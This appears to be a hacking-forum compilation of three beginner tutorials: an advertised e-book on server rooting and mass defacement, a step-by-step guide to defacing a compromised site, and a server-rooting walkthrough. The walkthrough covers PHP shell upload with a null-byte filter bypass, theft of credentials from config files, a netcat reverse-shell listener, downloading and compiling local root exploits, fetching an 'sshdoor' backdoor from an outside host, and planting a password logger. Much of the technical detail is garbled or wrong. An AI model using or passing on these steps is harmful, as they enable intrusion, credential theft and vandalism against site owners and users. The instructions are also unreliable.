How to r00t on server : E-book by Black -X Genius

hi Guys ... I'm Got many maggesges in my inbox about server r00t.I think  too many pepole are intrested in Server r00t so today I'm Presneting My Tunsian Friend Black-X Genius's Ebook On server r00ting. Hope You will Enjoy The book

This small book is will explain
you how professional hackers got root on servers.
this book is for beginner.

Leassons Of Book

Lesson 1- What is Root ?
Lesson 2- How can I get on the Root ?
Lesson 3- Local root and how to search for
him ?
Lesson 4- How connect the server ?
Lesson 5- How to get Root access ?
Lesson 6- What happen after the root ?
Lesson 7- The withdrawal of my domain ?
Lesson 8- How to do mass deface ?
Lesson 9- How to register the hacked
websites on Zoneh?
Lesson 10- How to clear tracks from serve ?

Download Link - http://www.mediafire.com/?tzmsm3l5d7zj864

Read more ...>>

How to Deface a Rooted Server

How to Deface a "r00ted" Server
Please try to follow along even if in some parts am not making any sees to you.
Thank you and enjoy the TuT':thumbsup:

**********STEP 1**********
First what you want to do is get a idea of what you want the deface to say and what language your most likely going to use.
*** common languages for deface are***
1.HTML
2.CSS
3.XML
4.php(Not to sure about this one)
5.CS5 using adobe(If you wanna get fancy)
the choices may very....
but for this TuT am were going to use HTML because its more common. What ever language you happen to choose (I recommend HTML) you want to make sure you brush up on it and are very familiar with it so to be able to make a decent looking file to host on the "rooted" server.


**********STEP 2**********
The next thing you want to do is look at the server database of the location were you are going to be hosting the .html deface file and to see what the server will take and will not take from .html files.THIS IS VERY IMPORTANT you must check with the server and test out the files before you try to host or make your deface html file (Some Server I come across with only host XML or CSS) you want to make sure you know what type of language it will host and what the will not host.
alot of the times servers can be very expandable so it will take mostly anything you throw at it but just to be sure please check.

**********STEP 3**********
Well ones you have done all your checking and you looked at the server and you have a basic idea of what you'll be doing we can start building the your deface file.

***Tool's you will need***
1. notepad++(I recommend this version of notepad) link Click Here
2. A guide to all the html or the language you'll be using
unless your TOTAL NINJA:ninja: at the language then you
skip this tool
3. (This one you'll need it will cut the work in almost half)
phpMyAdmin- this tool will let you test your .html ect. and it won't take you a sec. to download here's the link http://www.phpmyadmin.net/home_page/index.php-OK one's you have all the tools listed here (guide is optional) you can start building the .html file using the tools i just listed it should be a snap if done right.
-OK listen up here!! at this point you might think am also going to show you how to write html too huh? well sorry to say it but showing you
how to right html and explaining how to do this would take WAY!! to long and if your here on a defacing TuT' and you don't know how to write html then you should really bein a html TuT'.my html TuT coming soon!!!
-OK so ones you have your html file is made you can save it as a .html file. you can name it what ever you want doesn't matter it won't affect
the proses at all and the one's you tested it out on phpMyAdmin and your are happy with the results thenyou can start the defacing!:hehe:


**********STEP 4**********
-OK the next step you want to take is opening your "rooted" server
BUT you always want to be sure VERY sure you have a good! proxy server running and you always havemulti s0cks for your http browser wen you are entering a "r00ted" server and never EVER EVER!!! set theserver config setting to your own settings(most servers have auto config for admin account)this logs the last login from the admin and ads the ip and port number it came from and if to don't have a pr0xy and good s0cks then you must be VERY careful of the IP and port you use and NEVER! set the config up yourself you'll screw-up the ip settings on the server.:nono:

**********STEP 5**********
-OK one's you are in the admin accounts and the server settings youwant to look for an .html or ect. and you want to copy all of the code you see.Then you want to open your regular notepad and paste all the code inside the notepad doc. after the code is all in there you want to save the doc. as a .html file name it whatever.Then you want to open it and see if the file looks like the site server you "r00ted" if so the you want to go back to the server then you want to erase all of the code that you copied, after you have done that you want to refresh the server setting and type in the URL of the site that you "r00ted". If nothingshows up but the page is done loading then that means you have just taken the html visuals out and the site is faceless!!!

**********STEP 6**********
-OK ones the site is faceless you want to so back to the server settingand you want to add your file and make sure that the server is runningthe defacing file.So about this point you think your done huh? well wrong your not, you need to make apath for the file to and for the user to be redirected to if this step is not done all the user will see is the blank page, another reason why you need a path is because if the admin of the server ever gets back the admin account it will be harder for them to find the file from were the defacing is coming from thus making it harder for them to take it down. :hehe:

**********STEP 7**********
-OK in order to make a good path forthe file you must find a empty path name on the server that is not beingused by another file hosted by the server. Wen i look for one i try to find the dorks for them on Google.com
but you want just guest most of the time and land on a empty one all the time most small sites have all the common one and not the Ftp paths and the .asp paths but its all up to you!
ones you have your file hosted and your paths is found all you have to do is replace the URL of the site and the redirect URL of the site to both of your html file and your path.
EXAMPLE: http://www.example.com/(your file path here).html
then you want to replace the regular URL with your are try it out!!!!.:yeye:
if all came out well and the deface page looks good then your mission is completed!!!.:thumbsup:
you have just defaced a website!!.
if google doesnt pick up on it then give it a day or two then try again am sure! it will work!! then the final step i to brag to all your friends about your hacked! site. :tongue:
thank you for reading...

Read more ...>>

Server Rooting Full Tutorial

Rooting isn’t just simply finding a local root exploit,
Rooting is gaining a high uid on a server which gains statics to control the entire server.
Most people think they are actually completing their step in rooting when they are not,
all people do is mixed in this order:

1. Back Connect OR use the prompt in the shell itself and type in uname -a

2. Get the version for the box, it may be familiar to 2.6.18

3. Go on securityfocus or 1337day.com and search for it.

4. Get a connection via back-connect, then they simply wget a Local Root Exploit.

Or simply go to the PHP shell itself and go to a dir and upload a .C file which pertains a Local Root Exploit.

5- Get the ID it was labeled, it will be featured in the wget results,
or if you did it via shell, you will know the name it was given because you uploaded it.

6. Then simply gcc -o ExploitName or gcc -o LocalRootExploitName.c

But today I will be showing you how to do this and actually understand what you are doing.
You will use 1337day and while your doing this you will upgrade your knowledge.

First, get your PHP shell, you can upload it through FTP using mput
(mput is a command used to add something on a server included from your system, example: mput C:usersX-pOSedshell.php)
Or you can do it if you find an upload.php dir on the system,
of course upload.php can feature uploading php,
or it can feature an only accessory for .jpg/.png/etc. Well,
this can easily be bypassed through a Null Byte Upload, to do this,
all you need to do is compile your php script into a .jpg function.

You can do this by following these steps:

1. Open Notepad

2. Add your php script

3. File >> Save as >> shellname.php.jpg (you have to leave it is a URL-Encoded Byte)

4. Upload on the server.

Null Byte is used to terminate anything after it.

But this can be patched on some web servers, so DO NOT expect it to work 100%.

But if /upload.php features an accessible function for the extension .php
Then upload your normal PHP Shell. And then you need to find the directory,
you can usually get this by doing the following:

1. Your victimized site has to have Anonymous User enabled.

2. Open Command Prompt

3. Type in ftp http://www.victim.com

4. Enter wrong details when it asks for user and password

5. After that is finished type in: quote user ftp (It quotes the user under the name FTP) then type in: quote cwd ~root (Pertains the cwd of root) then type in: quote pass ftp

Now you have the ability to view dirs, cd to directories, etc.

Try finding incoming, and if you do, try finding your shell.

If you cannot find anything, there are other things you can do.

You can use acunetix web scanner to find directories.

After you got your shell up and ready, play around a bit,
and try finding mysql details (in config.php, irc details in ircd.conf, etc, etc) If you find it there is probably an mysql option in your shell, use it.
You can also try logging in with those details in SSH, which can get you root easily. To try this out, you cannot just telnet to port 22, because port 22 (ssh) has its own client/server.

Download PuTTy Click Here

Insert the site you want to connect to, and be sure the label is selected on SSH.

Once you do that, press Open.

Now try the details you got in config.php

If it doesn’t work, your out of luck on that probability.

But, we do not stop there.

Go to "Back Connection” your IP is in the text box and in the sec text box is your port,
the port you want to back-connect to needs to be forwarded. This can be easily done if you locate your HTTP config for your router.
You can find this in command prompt by typing in ipconfig and in linux all you need to do is type in ifconfig.

Now go to the main router page (192.168.0.1 as an example), then search around for Port Forwarding. Your router page may require a password,
if its changed, just simply restart your router, and if it still does not work, search on google.

After your port is forwarded (Port forward example: 1337) insert it into the second text box. But wait up, your not done. You will need to install netcat,
in linux simply:

sudo apt-get install netcat

And in Windows, go to this link:

Click Here

You might need to uninstall winrar, well, put nc111nt.zip in a directory, on your desktop, documents, anywhere. I recommend putting it on the desktop time-being.

Then open Command Prompt, then type in cd C:usersNAMEdesktopnc111nt or cd C:usersNAMEdesktopnc111nt.zip

Now when your in there, type:

nc

If anything comes back, its working.

Now type in:

nc -l -n -v -p PORT

PORT needs to be replaced with the port you forwarded.

Press enter, then go to your shell and press the magic button ( On the back-connection page where you inserted your IP along with the forwarded port).

Now you should be in your back-connect session. Type in:

uname -a

This will show us its current Linux Version, SMTP Version, PHP version, etc, for example:

Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Mon Jar 30 08:14:05 EDT 2011 i686

Now you go to 1337day.com, as you can see .

There are various more all you need to do is go 1337day and search for 2.6.17

That there is a C script that can be used for gaining root on the server.
Well, we can do this two ways, lets discuss the first:

1. Open Notepad

2. Put in the C script

3. File >> Save as >> LocalRootExploit.C

4. Upload it on the shell

5. Open your netcat session

6. Type in gcc root -o LocalRootExploit.c (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier uploaded via our shell, which in this case is LocalRootExploit.c)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID, it comes with something like: uid=(0)root you’ve completed your mission as well.

Or we can do this via netcat:

1. Go to your netcat session

2. Type in wget http://milw0rm.com/exploits/5092 (wget is used to download a file from a particular server, in this case: milw0rm)

4. Now considering 5092 was the last bit in our URL, that is what we will need to compile it as

5. Type in gcc root -o 5092 (gcc is a command in ssh used for compiling a certain directory,
this tells it to make a root dir, and open it as what we earlier wget’d, which in this case is 5092)

7. Type in ./root

8. It should clearly compile and give you root. To be sure simply type in:
whoami and/or id if whoami comes back with root, you’ve completed your mission, and if in ID,
it comes with something like: uid=(0)root you’ve completed your mission as well.

Now you can add an sshdoor via:

wget http://www.familysksd.phpnet.us/sshdoor

You can use plenty of commands and even sudo apt-get install some accessories you can also use the Edit command or Emacs command to add a password logger (php based) on login.php.

Read more ...>>